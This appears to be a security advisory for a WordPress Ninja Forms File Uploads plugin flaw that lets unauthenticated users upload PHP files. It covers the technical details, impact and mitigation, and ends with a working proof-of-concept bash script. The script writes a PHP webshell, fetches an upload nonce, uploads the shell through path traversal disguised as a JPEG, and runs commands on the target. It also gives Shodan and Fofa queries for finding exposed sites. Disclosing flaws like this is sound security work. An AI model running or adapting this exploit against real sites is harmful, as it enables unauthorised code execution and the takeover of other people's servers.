Ninja Forms Uploads – Unauthenticated PHP File Upload Vulnerability
The Ninja Forms Uploads vulnerability, identified as CVE-2026-0740, represents a significant security risk affecting users of the popular WordPress plugin, Ninja Forms. This vulnerability allows unauthenticated attackers to upload arbitrary PHP files to the server, potentially leading to a full compromise of the affected website.
Technical Details
This vulnerability arises from improper validation of file uploads within the Ninja Forms plugin. Specifically, the lack of sufficient access controls enables attackers to exploit the file upload feature without authentication. By crafting a malicious request, an attacker can upload a PHP file disguised as an innocuous file type, such as an image. Once uploaded, the PHP file can be executed on the server, allowing the attacker to run arbitrary code.
For instance, an attacker might send a POST request to the upload endpoint with a PHP shell script hidden within an image file. Upon successful upload, the attacker can then access the uploaded file via the web server, leading to potential data breaches, site defacement, or the installation of malware.
Impact
The consequences of this vulnerability can be severe. If exploited, it can lead to unauthorized access to sensitive data, complete server takeover, and even the distribution of malware to site visitors. Organizations relying on the Ninja Forms plugin may find their reputation damaged, face legal repercussions, and incur significant recovery costs.
Mitigation
To protect against CVE-2026-0740, organizations should take immediate action by updating the Ninja Forms plugin to the latest version, where this vulnerability has been patched. Additionally, implementing a web application firewall (WAF) can help filter out malicious requests before they reach the server.
Security professionals are advised to conduct regular security audits and vulnerability assessments to identify and remediate potential security weaknesses. Enforcing strict file upload validation rules and employing server-side controls can further mitigate the risk of unauthorized file uploads. Taking these proactive measures will enhance the overall security posture of WordPress installations utilizing Ninja Forms.
Proof of Concept (PoC)
# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date: 2026-04-09
# Exploit Author: Sélim Lanouar (@whattheslime)
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://ninjaforms.com/extensions/file-uploads/
# Version: 3.3.24
# Tested on: WordPress (6.9.3) on Apache and Nginx servers
# CVE: CVE-2026-0740
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <target_url>"
exit 1
fi
target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php"
-d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php"
-F "action=nf_fu_upload"
-F "nonce=$nonce"
-F "form_id=$field_id"
-F "field_id=$field_id"
-F "image_jpg=../../../$file_name"
-F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"